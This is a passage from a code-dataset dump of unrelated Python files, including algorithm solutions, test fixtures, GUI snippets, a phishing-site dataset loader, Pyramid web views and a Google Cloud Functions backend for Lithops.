m, n, balance = nums[i-k], nums[i], 0 \r\n if m >= bheap[0]: # handle deleting\r\n balance -= 1\r\n if m == bheap[0]: # handle tops now; else we'd have to check top before balancing, then check tops again\r\n heappop(bheap)\r\n else:\r\n hashes[m] += 1\r\n else: \r\n balance += 1\r\n if m == -theap[0]: \r\n heappop(theap)\r\n else:\r\n hashes[m]+=1\r\n if bheap and n >= bheap[0]: # handle adding\r\n balance += 1\r\n heappush(bheap, n)\r\n else:\r\n balance -= 1\r\n heappush(theap, -n) \r\n if balance < 0: # len(bheap) < len(theap)\r\n heappush(bheap, -heappop(theap)) # the top of theap/bheap is always valid at this point\r\n elif balance > 0:\r\n heappush(theap, -heappop(bheap)) \r\n while bheap and hashes[bheap[0]]: # the removed-from heap might have an invalid top, so fix (doesn't change balance)\r\n hashes[heappop(bheap)] -= 1\r\n while theap and hashes[-theap[0]]:\r\n hashes[-heappop(theap)] -= 1 \r\n medians.append(float(bheap[0]) if k&1 else (bheap[0] - theap[0]) / 2.0) \r\n return medians\r\n \r\n # Based off: https://discuss.leetcode.com/topic/74679/o-n-log-n-time-c-solution-using-two-heaps-and-a-hash-table/4\r\n def solution3(self, nums, k): \r\n \"\"\"After changes, basically the same as Solution2, but with more explicit variable names and slightly diff initialization\"\"\"\r\n to_be_deleted, res = defaultdict(int), []\r\n top_half, bottom_half = nums[:k], []\r\n heapq.heapify(top_half)\r\n while len(top_half) - len(bottom_half) > 1:\r\n heappush(bottom_half, -heappop(top_half))\r\n res.append(float(top_half[0]) if k&1 else (top_half[0] - bottom_half[0])/2.0)\r\n for i in xrange(k, len(nums)):\r\n num, num_to_be_deleted = nums[i], nums[i-k]\r\n top_bottom_balance = 0\r\n if num_to_be_deleted >= top_half[0]:\r\n top_bottom_balance -= 1\r\n if num_to_be_deleted == top_half[0]:\r\n heappop(top_half)\r\n else:\r\n to_be_deleted[num_to_be_deleted] += 1\r\n else:\r\n top_bottom_balance += 1\r\n if num_to_be_deleted == -bottom_half[0]:\r\n heappop(bottom_half)\r\n else:\r\n to_be_deleted[num_to_be_deleted] += 1\r\n if top_half and num >= top_half[0]:\r\n top_bottom_balance+=1\r\n heappush(top_half, num)\r\n else:\r\n top_bottom_balance-=1\r\n heappush(bottom_half, -num)\r\n if top_bottom_balance > 0:\r\n heappush(bottom_half, -heappop(top_half))\r\n elif top_bottom_balance < 0:\r\n heappush(top_half, -heappop(bottom_half))\r\n while top_half and to_be_deleted[top_half[0]]:\r\n to_be_deleted[heappop(top_half)] -= 1\r\n while bottom_half and to_be_deleted[-bottom_half[0]]:\r\n to_be_deleted[-heappop(bottom_half)] -= 1\r\n \r\n res.append(float(top_half[0]) if k&1 else (top_half[0]-bottom_half[0])/2.0)\r\n return res\r\n ","sub_path":"leetcode/python/SlidingWindowMedian.py","file_name":"SlidingWindowMedian.py","file_ext":"py","file_size_in_byte":9499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"285125946","text":"import asyncio\nimport logging\nimport typing\n\nimport pytest\nfrom pytest_httpserver import httpserver\n\nfrom mergify_engine import config\nfrom mergify_engine import logs\nfrom mergify_engine import utils\nfrom mergify_engine.clients import github\n\n\n@pytest.fixture()\ndef logger_checker(request, caplog):\n # daiquiri removes all handlers during setup, as we want to sexy output and the pytest\n # capability at the same, we must add back the pytest handler\n logs.setup_logging()\n logging.getLogger(None).addHandler(caplog.handler)\n yield\n for when in (\"setup\", \"call\", \"teardown\"):\n messages = [\n rec.getMessage()\n for rec in caplog.get_records(when)\n if rec.levelname in (\"CRITICAL\", \"ERROR\")\n ]\n assert [] == messages\n\n\n@pytest.fixture(autouse=True)\ndef setup_new_event_loop() -> None:\n # ensure each tests have a fresh event loop\n asyncio.set_event_loop(asyncio.new_event_loop())\n\n\n@pytest.fixture()\nasync def redis_cache() -> typing.AsyncGenerator[utils.RedisCache, None]:\n with utils.aredis_for_cache() as client:\n await client.flushdb()\n try:\n yield client\n finally:\n await client.flushdb()\n client.connection_pool.disconnect()\n await utils.stop_pending_aredis_tasks()\n\n\n@pytest.fixture()\nasync def redis_stream() -> typing.AsyncGenerator[utils.RedisStream, None]:\n with utils.aredis_for_stream() as client:\n await client.flushdb()\n try:\n yield client\n finally:\n await client.flushdb()\n client.connection_pool.disconnect()\n await utils.stop_pending_aredis_tasks()\n\n\n@pytest.fixture()\nasync def github_server(\n httpserver: httpserver.HTTPServer, monkeypatch: pytest.MonkeyPatch\n) -> typing.AsyncGenerator[httpserver.HTTPServer, None]:\n monkeypatch.setattr(config, \"GITHUB_API_URL\", httpserver.url_for(\"/\")[:-1])\n monkeypatch.setattr(github.CachedToken, \"STORAGE\", {})\n\n httpserver.expect_request(\"/users/owner/installation\").respond_with_json(\n {\n \"id\": 12345,\n \"target_type\": \"User\",\n \"permissions\": {\n \"checks\": \"write\",\n \"contents\": \"write\",\n \"pull_requests\": \"write\",\n },\n \"account\": {\"login\": \"owner\", \"id\": 12345},\n }\n )\n httpserver.expect_request(\n \"/app/installations/12345/access_tokens\"\n ).respond_with_json({\"token\": \"\", \"expires_at\": \"2100-12-31T23:59:59Z\"})\n\n yield httpserver\n","sub_path":"mergify_engine/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"578312401","text":"# Nolan Harris\n# nph2tx\n# This program prints a range of ages you are compatible to date\n\nage = int(input(\"What is your age?: \"))\n\nage1 = (age // 2 + 7)\n\nage2 = (age * 2 - 13)\n\nprint(\"You can date people between\", age1, \"and\", age2)\n\n\n\n","sub_path":"CS1110/CS1110/dating.py/dating.py","file_name":"dating.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"224132167","text":"import gi\ngi.require_version(\"Gtk\", \"3.0\")\nimport gi.repository.Gtk as Gtk\nimport gi.repository.GdkPixbuf as GdkPixbuf\n\nclass MsgArrive(Gtk.Box):\n def __init__(self, Msg):\n Gtk.Box.__init__(self, orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n\n self.avatar = Gtk.Image()\n self.avatar.set_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_scale(\n filename=\"share/fancychat/preferences-desktop-emoticons.svg\",\n width=48,\n height=48,\n preserve_aspect_ratio=True\n ))\n\n self.msg = Gtk.Label(Msg)\n self.msg.get_style_context().add_class(\"msg-text-arrive\")\n #self.msg.set_halign(Gtk.Align.END)\n self.msg.set_justify(Gtk.Justification.RIGHT)\n self.msg.set_line_wrap(True)\n\n self.pack_start(self.avatar, False, False, 0)\n self.pack_start(self.msg, True, True, 0)","sub_path":"fancychat/MsgArrive.py","file_name":"MsgArrive.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"295546762","text":"import easygui as g\r\nimport os.path\r\n\r\nfile = g.fileopenbox()\r\nfile_name = os.path.basename(file)\r\nf = open(file)\r\nF = list(f)\r\ng.textbox('文件【%s】的内容如下:'%file_name,'显示文件内容',text = F)\r\nanswer = g.choicebox('检测到文件内容发生改变,请选择以下操作:','警告',choices = ['覆盖保存','放弃保存','另存为...'])\r\n\r\nif answer == '覆盖保存':\r\n f.close()\r\nelif answer == '另存为...':\r\n path = g.filesavebox(default = file)\r\n F_2 = open(path, 'w')\r\n F_2.writelines(F)\r\n F_2.close()\r\n \r\n","sub_path":"打开TXT文件(用IDLE运行会报错).py","file_name":"打开TXT文件(用IDLE运行会报错).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333472635","text":"#\n# Copyright Cloudlab URV 2020\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport logging\nimport json\nimport base64\nimport httplib2\nimport zipfile\nimport time\nimport google.auth\nfrom google.cloud import pubsub_v1\nfrom google.oauth2 import service_account\nfrom google_auth_httplib2 import AuthorizedHttp\nfrom googleapiclient.discovery import build\nfrom google.auth import jwt\n\nfrom lithops import utils\nfrom lithops.version import __version__\nfrom lithops.constants import COMPUTE_CLI_MSG, JOBS_PREFIX, TEMP_DIR\n\nfrom . import config\n\nlogger = logging.getLogger(__name__)\n\n\nclass GCPFunctionsBackend:\n def __init__(self, gcf_config, internal_storage):\n self.name = 'gcp_functions'\n self.type = 'faas'\n self.gcf_config = gcf_config\n self.region = gcf_config['region']\n self.num_retries = gcf_config['retries']\n self.retry_sleep = gcf_config['retry_sleep']\n self.trigger = gcf_config['trigger']\n self.credentials_path = gcf_config.get('credentials_path')\n\n self.internal_storage = internal_storage\n\n self._build_api_resource()\n\n msg = COMPUTE_CLI_MSG.format('Google Cloud Functions')\n logger.info(f\"{msg} - Region: {self.region} - Project: {self.project_name}\")\n\n def _format_function_name(self, runtime_name, runtime_memory=None):\n version = 'lithops_v' + __version__\n runtime_name = (version + '_' + runtime_name).replace('.', '-')\n\n if runtime_memory:\n return f'{runtime_name}_{runtime_memory}MB'\n else:\n return f'{runtime_name}'\n \n def _unformat_function_name(self, function_name):\n runtime_name, runtime_memory = function_name.rsplit('_', 1)\n runtime_name = runtime_name.replace('lithops_v', '')\n version, runtime_name = runtime_name.split('_', 1)\n version = version.replace('-', '.')\n return version, runtime_name, runtime_memory.replace('MB', '')\n\n def _build_api_resource(self):\n \"\"\"\n Setup Credentials and resources\n \"\"\"\n if self.credentials_path and os.path.isfile(self.credentials_path):\n logger.debug(f'Getting GCP credentials from {self.credentials_path}')\n \n api_cred = service_account.Credentials.from_service_account_file(\n self.credentials_path, scopes=config.SCOPES\n )\n self.project_name = api_cred.project_id\n self.service_account = api_cred.service_account_email\n \n pubsub_cred = jwt.Credentials.from_service_account_file(\n self.credentials_path,\n audience=config.AUDIENCE\n ) \n else:\n logger.debug(f'Getting GCP credentials from the environment')\n api_cred, self.project_name = google.auth.default(scopes=config.SCOPES)\n self.service_account = api_cred.service_account_email\n pubsub_cred = None\n\n self._pub_client = pubsub_v1.PublisherClient(credentials=pubsub_cred)\n\n http = AuthorizedHttp(api_cred, http=httplib2.Http())\n self._api_resource = build(\n 'cloudfunctions', config.FUNCTIONS_API_VERSION,\n http=http, cache_discovery=False\n )\n\n @property\n def _default_location(self):\n return f'projects/{self.project_name}/locations/{self.region}'\n\n def _format_topic_name(self, runtime_name, runtime_memory):\n return self._format_function_name(runtime_name, runtime_memory) +'_'+ self.region + '_topic'\n\n def _get_default_runtime_name(self):\n py_version = utils.CURRENT_PY_VERSION.replace('.', '')\n return f'lithops-default-runtime-v{py_version}'\n\n def _get_topic_location(self, topic_name):\n return f'projects/{self.project_name}/topics/{topic_name}'\n\n def _get_function_location(self, function_name):\n return f'{self._default_location}/functions/{function_name}'\n\n def _get_runtime_bin_location(self, runtime_name):\n function_name = self._format_function_name(runtime_name)\n return config.USER_RUNTIMES_PREFIX + '/' + function_name + '_bin.zip'\n\n def _encode_payload(self, payload):\n return base64.b64encode(bytes(json.dumps(payload), 'utf-8')).decode('utf-8')\n\n def _list_built_runtimes(self, default_runtimes=True):\n \"\"\"\n Lists all the built runtimes uploaded by self.build_runtime()\n \"\"\"\n runtimes = []\n\n if default_runtimes:\n runtimes.extend(self._get_default_runtime_name())\n\n user_runtimes_keys = self.internal_storage.storage.list_keys(\n self.internal_storage.bucket, prefix=config.USER_RUNTIMES_PREFIX\n )\n runtimes.extend([runtime for runtime in user_runtimes_keys])\n return runtimes\n\n def _wait_function_deleted(self, function_location):\n # Wait until function is completely deleted\n while True:\n try:\n response = self._api_resource.projects().locations().functions().get(\n name=function_location\n ).execute(num_retries=self.num_retries)\n logger.debug(f'Function status is {response[\"status\"]}')\n if response['status'] == 'DELETE_IN_PROGRESS':\n time.sleep(self.retry_sleep)\n else:\n raise Exception(f'Unknown status: {response[\"status\"]}')\n except Exception as e:\n logger.debug(f'Function status is DELETED')\n break\n\n def _create_function(self, runtime_name, memory, timeout=60):\n \"\"\"\n Creates all the resources needed by a function\n \"\"\"\n # Create topic\n topic_name = self._format_topic_name(runtime_name, memory)\n topic_location = self._get_topic_location(topic_name)\n logger.debug(f\"Creating topic {topic_location}\")\n topic_list_response = self._pub_client.list_topics(\n request={'project': f'projects/{self.project_name}'})\n topics = [topic.name for topic in topic_list_response]\n if topic_location in topics:\n logger.debug(f\"Topic {topic_location} already exists - Restarting queue\")\n self._pub_client.delete_topic(topic=topic_location)\n self._pub_client.create_topic(name=topic_location)\n\n # Create the function\n function_name = self._format_function_name(runtime_name, memory)\n function_location = self._get_function_location(function_name)\n logger.debug(f\"Creating function {topic_location}\")\n\n fn_list_response = self._api_resource.projects().locations().functions().list(\n parent=self._default_location\n ).execute(num_retries=self.num_retries)\n if 'functions' in fn_list_response:\n deployed_functions = [fn['name'] for fn in fn_list_response['functions']]\n if function_location in deployed_functions:\n logger.debug(f\"Function {function_location} already exists - Deleting function\")\n self._api_resource.projects().locations().functions().delete(\n name=function_location,\n ).execute(num_retries=self.num_retries)\n self._wait_function_deleted(function_location)\n\n bin_location = self._get_runtime_bin_location(runtime_name)\n cloud_function = {\n 'name': function_location,\n 'description': 'Lithops Worker for Lithops v'+ __version__,\n 'entryPoint': 'main',\n 'runtime': config.AVAILABLE_PY_RUNTIMES[utils.CURRENT_PY_VERSION],\n 'timeout': str(timeout) + 's',\n 'availableMemoryMb': memory,\n 'serviceAccountEmail': self.service_account,\n 'maxInstances': 0,\n 'sourceArchiveUrl': f'gs://{self.internal_storage.bucket}/{bin_location}'\n }\n\n if self.trigger == 'http':\n cloud_function['httpsTrigger'] = {}\n\n elif self.trigger == 'pub/sub':\n topic_name = self._format_topic_name(runtime_name, memory)\n topic_location = self._get_topic_location(topic_name)\n cloud_function['eventTrigger'] = {\n 'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',\n 'resource': topic_location,\n 'failurePolicy': {}\n }\n\n logger.debug(f'Creating function {function_location}')\n response = self._api_resource.projects().locations().functions().create(\n location=self._default_location,\n body=cloud_function\n ).execute(num_retries=self.num_retries)\n\n # Wait until function is completely deployed\n logger.info('Waiting for the function to be deployed')\n while True:\n response = self._api_resource.projects().locations().functions().get(\n name=function_location\n ).execute(num_retries=self.num_retries)\n logger.debug(f'Function status is {response[\"status\"]}')\n if response['status'] == 'ACTIVE':\n break\n elif response['status'] == 'OFFLINE':\n raise Exception('Error while deploying Cloud Function')\n elif response['status'] == 'DEPLOY_IN_PROGRESS':\n time.sleep(self.retry_sleep)\n else:\n raise Exception(f\"Unknown status {response['status']}\")\n\n def build_runtime(self, runtime_name, requirements_file, extra_args=[]):\n logger.info(f'Building runtime {runtime_name} from {requirements_file}')\n\n if not requirements_file:\n raise Exception('Please provide a \"requirements.txt\" file with the necessary modules')\n\n try:\n entry_point = os.path.join(os.path.dirname(__file__), 'entry_point.py')\n utils.create_handler_zip(config.FH_ZIP_LOCATION, entry_point, 'main.py')\n with zipfile.ZipFile(config.FH_ZIP_LOCATION, 'a') as lithops_zip:\n lithops_zip.write(requirements_file, 'requirements.txt', zipfile.ZIP_DEFLATED)\n with open(config.FH_ZIP_LOCATION, \"rb\") as action_zip:\n action_bin = action_zip.read()\n bin_location = self._get_runtime_bin_location(runtime_name)\n self.internal_storage.put_data(bin_location, action_bin)\n finally:\n os.remove(config.FH_ZIP_LOCATION)\n\n logger.debug(f'Runtime {runtime_name} built successfuly')\n\n def _build_default_runtime(self, runtime_name):\n \"\"\"\n Builds the default runtime\n \"\"\"\n requirements_file = os.path.join(TEMP_DIR, 'gcf_default_requirements.txt')\n with open(requirements_file, 'w') as reqf:\n reqf.write(config.REQUIREMENTS_FILE)\n try:\n self.build_runtime(runtime_name, requirements_file)\n finally:\n os.remove(requirements_file)\n\n def deploy_runtime(self, runtime_name, memory, timeout):\n logger.info(f\"Deploying runtime: {runtime_name} - Memory: {memory} Timeout: {timeout}\")\n\n if runtime_name == self._get_default_runtime_name():\n self._build_default_runtime(runtime_name)\n\n self._create_function(runtime_name, memory, timeout)\n\n # Get runtime metadata\n runtime_meta = self._generate_runtime_meta(runtime_name, memory)\n\n return runtime_meta\n\n def delete_runtime(self, runtime_name, runtime_memory):\n function_name = self._format_function_name(runtime_name, runtime_memory)\n function_location = self._get_function_location(function_name)\n logger.info(f'Deleting runtime: {runtime_name} - {runtime_memory}MB')\n\n # Delete function\n self._api_resource.projects().locations().functions().delete(\n name=function_location,\n ).execute(num_retries=self.num_retries)\n logger.debug('Request Ok - Waiting until function is completely deleted')\n\n self._wait_function_deleted(function_location)\n\n # Delete Pub/Sub topic attached as trigger for the cloud function\n logger.debug('Listing Pub/Sub topics')\n topic_name = self._format_topic_name(runtime_name, runtime_memory)\n topic_location = self._get_topic_location(topic_name)\n topic_list_request = self._pub_client.list_topics(\n request={'project': f'projects/{self.project_name}'}\n )\n topics = [topic.name for topic in topic_list_request]\n if topic_location in topics:\n logger.debug(f'Going to delete topic {topic_name}')\n self._pub_client.delete_topic(topic=topic_location)\n logger.debug(f'Ok - topic {topic_name} deleted')\n\n # Delete user runtime from storage\n bin_location = self._get_runtime_bin_location(runtime_name)\n user_runtimes = self._list_built_runtimes(default_runtimes=False)\n if bin_location in user_runtimes:\n self.internal_storage.storage.delete_object(\n self.internal_storage.bucket, bin_location)\n\n def clean(self):\n logger.debug('Going to delete all deployed runtimes')\n runtimes = self.list_runtimes()\n for runtime_name, runtime_memory, version in runtimes:\n self.delete_runtime(runtime_name, runtime_memory)\n\n def list_runtimes(self, runtime_name='all'):\n logger.debug('Listing deployed runtimes')\n response = self._api_resource.projects().locations().functions().list(\n parent=self._default_location\n ).execute(num_retries=self.num_retries)\n\n deployed_runtimes = [f['name'].split('/')[-1] for f in response.get('functions', [])]\n runtimes = []\n for func_runtime in deployed_runtimes:\n if 'lithops_v' in func_runtime:\n version, fn_name, memory = self._unformat_function_name(func_runtime)\n if runtime_name == fn_name or runtime_name == 'all':\n runtimes.append((fn_name, memory, version))\n\n return runtimes\n\n def invoke(self, runtime_name, runtime_memory, payload={}):\n topic_location = self._get_topic_location(self._format_topic_name(runtime_name, runtime_memory))\n\n fut = self._pub_client.publish(\n topic_location,\n bytes(json.dumps(payload, default=str).encode('utf-8'))\n )\n invocation_id = fut.result()\n\n return invocation_id\n\n def _generate_runtime_meta(self, runtime_name, memory):\n logger.debug(f'Extracting runtime metadata from: {runtime_name}')\n\n function_name = self._format_function_name(runtime_name, memory)\n function_location = self._get_function_location(function_name)\n\n payload = {\n 'get_metadata': {\n 'runtime_name': runtime_name,\n 'storage_config': self.internal_storage.storage.storage_config\n }\n }\n\n # Data is b64 encoded so we can treat REST call the same as async pub/sub event trigger\n response = self._api_resource.projects().locations().functions().call(\n name=function_location,\n body={'data': json.dumps({'data': self._encode_payload(payload)})}\n ).execute(num_retries=self.num_retries)\n\n if 'result' in response and response['result'] == 'OK':\n object_key = '/'.join([JOBS_PREFIX, runtime_name + '.meta'])\n\n runtime_meta_json = self.internal_storage.get_data(object_key)\n runtime_meta = json.loads(runtime_meta_json)\n self.internal_storage.storage.delete_object(self.internal_storage.bucket, object_key)\n return runtime_meta\n elif 'error' in response:\n raise Exception(response['error'])\n else:\n raise Exception(f'Error at retrieving runtime meta: {response}')\n\n def get_runtime_key(self, runtime_name, runtime_memory):\n function_name = self._format_function_name(runtime_name, runtime_memory)\n runtime_key = os.path.join(self.name, __version__, self.project_name, self.region, function_name)\n logger.debug(f'Runtime key: {runtime_key}')\n\n return runtime_key\n\n def get_runtime_info(self):\n \"\"\"\n Method that returns all the relevant information about the runtime set\n in config\n \"\"\"\n if utils.CURRENT_PY_VERSION not in config.AVAILABLE_PY_RUNTIMES:\n raise Exception(f'Python {utils.CURRENT_PY_VERSION} is not available for Google '\n f'Cloud Functions. Please use one of {config.AVAILABLE_PY_RUNTIMES.keys()}')\n\n if 'runtime' not in self.gcf_config or self.gcf_config['runtime'] == 'default':\n self.gcf_config['runtime'] = self._get_default_runtime_name()\n \n runtime_info = {\n 'runtime_name': self.gcf_config['runtime'],\n 'runtime_memory': self.gcf_config['runtime_memory'],\n 'runtime_timeout': self.gcf_config['runtime_timeout'],\n 'max_workers': self.gcf_config['max_workers'],\n }\n\n return runtime_info\n","sub_path":"lithops/serverless/backends/gcp_functions/gcp_functions.py","file_name":"gcp_functions.py","file_ext":"py","file_size_in_byte":17364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"564658941","text":"#!/usr/bin/python3.4\n# coding=utf-8\n\nimport sys\nimport socket\n\ndef socket_client_func():\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('127.0.0.1',9999))\n\n print('send msg')\n s.send(b'msg 1')\n\n buffer = []\n while True:\n d = s.recv(1024)\n if d:\n buffer.append(d)\n else:\n break\n\n s.close()\n print(buffer)\n\nif __name__ == '__main__':\n socket_client_func()\n","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"251857650","text":"import html2text\nfrom os import listdir\nimport re, string\nimport pickle\nfrom shutil import rmtree\n\ndef read_html_files(directory):\n ''' \n Puts a list of rendered and cleaned text from the html and URLs of the UNIMAS phishing dataset\n into a binary file for easy reading.\n Args:\n directory: A string that is the directory to read files from. \n Should be \"phishing_site_dataset/Legitimate\" or \"phishing_site_dataset/Phishing\"\n '''\n\n html = []\n \n folders_to_read = listdir(directory)\n num_folders_to_read = len(folders_to_read)\n folders_to_read = iter(folders_to_read)\n\n i = 0\n while True:\n try:\n folder = next(folders_to_read)\n html_dir = directory + '/' + folder + '/RAW-HTML/'\n\n with open(html_dir + listdir(html_dir)[0], 'r', encoding = \"ISO-8859-1\") as f:\n data = f.read()\n html_data = html2text.html2text(data)\n\n # Clean data by removing non alphabetic characters\n pattern = re.compile('[^a-zA-Z ]')\n html_data = pattern.sub('', html_data)\n\n html.append([html_data])\n\n with open(directory + '/' + folder + '/URL/URL.txt', 'r') as f:\n html[i].append(f.read())\n\n i += 1\n \n except (FileNotFoundError, NotImplementedError):\n rmtree(directory + '/' + folder + '/')\n\n except StopIteration:\n break\n \n \n if i % 500 == 0:\n print(f'Read {i} out of {num_folders_to_read} folders')\n # print('Data from current read:\\n', html[i])\n\n return html\n\nwith open('phishing_site_dataset/phishing.pickle', 'wb') as output_file:\n pickle.dump(read_html_files('phishing_site_dataset/Phishing'), output_file)\n print('Successfully dumped Phishing data')\n\nwith open('phishing_site_dataset/legitimate.pickle', 'wb') as output_file:\n pickle.dump(read_html_files('phishing_site_dataset/Legitimate'), output_file)\n print('Successfully dumped Legitimate data')\n\n","sub_path":"generate_binary_data.py","file_name":"generate_binary_data.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"292812421","text":"from .Minions import *\r\nfrom .Spells import *\r\nfrom .Heros import *\r\nfrom .Weapons import *\r\n\r\nopeningHeros = [Malfurion, Rexxar, Jaina, Uther, Anduin, Valeera, Thrall, Guldan, Garrosh]\r\nCards = [[Moonfire,Claw,Acornbearer,],\r\n[ArcaneShot,ScavengingHyena,],\r\n[Countspell,],\r\n[MurlocKnight,],\r\n[Chameleos,NorthShireCleric,],\r\n[DeadlyPoison,Eviscerate,EdwinVanCleef,],\r\n[],\r\n[Defile,Howlfiend,Treachery,],\r\n[KoblodBarbarian,Gorehowl,],\r\n[MecHaroo,Pig,Wolf,BooldmageThalnos,IronbeakOwl,GrimPatron,],\r\n]","sub_path":"hsClient/gameModules/Cards4client.py","file_name":"Cards4client.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"292232798","text":"# -*- coding: utf-8 -*-\nfrom pyramid.view import view_config\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom intranet3.utils.views import BaseView\nfrom intranet3.models import Client, Project, DBSession\nfrom intranet3.log import INFO_LOG\nfrom intranet3.forms.project import ProjectForm\nfrom intranet3.forms.common import DeleteForm\nfrom intranet3.models.project import SelectorMapping\n\nLOG = INFO_LOG(__name__)\n\n\n@view_config(route_name='project_view', permission='can_view_projects')\nclass View(BaseView):\n def get(self):\n project_id = self.request.GET.get('project_id')\n project = Project.query.get(project_id)\n return dict(project=project)\n\n\n@view_config(route_name='project_add', permission='can_edit_projects')\nclass Add(BaseView):\n def dispatch(self):\n client_id = self.request.GET.get('client_id')\n client = Client.query.get(client_id)\n form = ProjectForm(self.request.POST)\n if self.request.method == 'POST' and form.validate():\n tracker_id = form.tracker_id.data\n coordinator_id = int(form.coordinator_id.data) if form.coordinator_id.data.isdigit() else None\n project = Project(\n client=client,\n name=form.name.data,\n coordinator_id=coordinator_id,\n tracker_id=tracker_id,\n turn_off_selectors=form.turn_off_selectors.data,\n project_selector=form.project_selector.data,\n component_selector=form.component_selector.data,\n version_selector=form.version_selector.data,\n ticket_id_selector=form.ticket_id_selector.data,\n active=form.active.data,\n google_card=form.google_card.data,\n google_wiki=form.google_wiki.data,\n mailing_url=form.mailing_url.data,\n working_agreement=form.working_agreement.data,\n definition_of_done=form.definition_of_done.data,\n definition_of_ready=form.definition_of_ready.data,\n continuous_integration_url=form.continuous_integration_url.data,\n backlog_url=form.backlog_url.data,\n status = form.status.data,\n )\n DBSession.add(project)\n DBSession.flush()\n self.flash(self._(u\"Project added\"))\n LOG(u\"Project added\")\n SelectorMapping.invalidate_for(tracker_id)\n return HTTPFound(location=self.request.url_for('/client/view', client_id=project.client_id))\n return dict(client=client, form=form)\n\n@view_config(route_name='project_edit', permission='can_edit_sprints')\nclass Edit(BaseView):\n def dispatch(self):\n project_id = self.request.GET.get('project_id')\n project = DBSession.query(Project).filter(Project.id==project_id).one()\n form = ProjectForm(self.request.POST, obj=project)\n # hack, when user has no permision can_edit_projects (that means that he has only scrum perms)\n # we do not validate the form\n if self.request.method == 'POST' and (not self.request.has_perm('can_edit_projects') or form.validate()):\n project.working_agreement = form.working_agreement.data\n project.definition_of_done = form.definition_of_done.data\n project.definition_of_ready = form.definition_of_ready.data\n project.continuous_integration_url = form.continuous_integration_url.data\n project.backlog_url = form.backlog_url.data\n project.status = form.status.data\n project.sprint_tabs = form.sprint_tabs.data\n if self.request.has_perm('can_edit_projects'):\n project.name = form.name.data\n coordinator_id = int(form.coordinator_id.data) if form.coordinator_id.data.isdigit() else None\n project.coordinator_id = coordinator_id\n project.tracker_id = form.tracker_id.data\n project.turn_off_selectors = form.turn_off_selectors.data\n project.project_selector = form.project_selector.data\n project.component_selector = form.component_selector.data\n project.version_selector = form.version_selector.data\n project.ticket_id_selector = form.ticket_id_selector.data\n project.active = form.active.data\n project.google_card = form.google_card.data\n project.google_wiki = form.google_wiki.data\n project.mailing_url = form.mailing_url.data\n project.status = form.status.data\n\n self.flash(self._(u\"Project saved\"))\n LOG(u\"Project saved\")\n SelectorMapping.invalidate_for(project.tracker_id)\n return HTTPFound(location=self.request.url_for('/project/edit', project_id=project.id))\n return dict(project_id=project.id, form=form)\n\n\n@view_config(route_name='project_delete', renderer='intranet3:templates/common/delete.html', permission='can_delete_projects')\nclass Delete(BaseView):\n def dispatch(self):\n project_id = self.request.GET.get('project_id')\n project = Project.query.get(project_id)\n form = DeleteForm(self.request.POST)\n back_url = self.request.url_for('/client/view', client_id=project.client_id)\n if self.request.method == 'POST' and form.validate():\n DBSession.delete(project)\n SelectorMapping.invalidate_for(project.tracker_id)\n return HTTPFound(location=back_url)\n return dict(\n type_name=u'project',\n title=project.name,\n url=self.request.url_for('/project/delete', project_id=project.id),\n back_url=back_url,\n form=form\n )\n","sub_path":"src/intranet3/intranet3/views/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"96831883","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(10**6)\n\ns = list(str(input()))\nt = list(str(input()))\n\nans = []\nfor i in range(len(s)-len(t)+1):\n # print(i)\n ans_tmp = \"\"\n for j in range(len(s)):\n if j >= i and i+len(t) > j:\n if s[j] == \"?\" or s[j] == t[j-i]:\n ans_tmp += t[j-i]\n else:\n break\n else:\n if s[j] == \"?\":\n ans_tmp += \"a\"\n else:\n ans_tmp += s[j]\n\n if len(ans_tmp) != len(s):\n continue\n else:\n ans.append(ans_tmp)\nans.sort()\n\nif len(ans) == 0:\n print(\"UNRESTORABLE\")\nelse:\n print(ans[0])\n","sub_path":"abc076/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"491786936","text":"import gym\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nfrom tqdm import tqdm\nfrom torch.distributions import Normal\nimport numpy as np\nimport holodeck\nfrom holodeck.sensors import *\nimport sys\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, mean=0., std=0.1)\n nn.init.constant_(m.bias, 0.0)\n\n\n# Define the Actor Critic\nclass 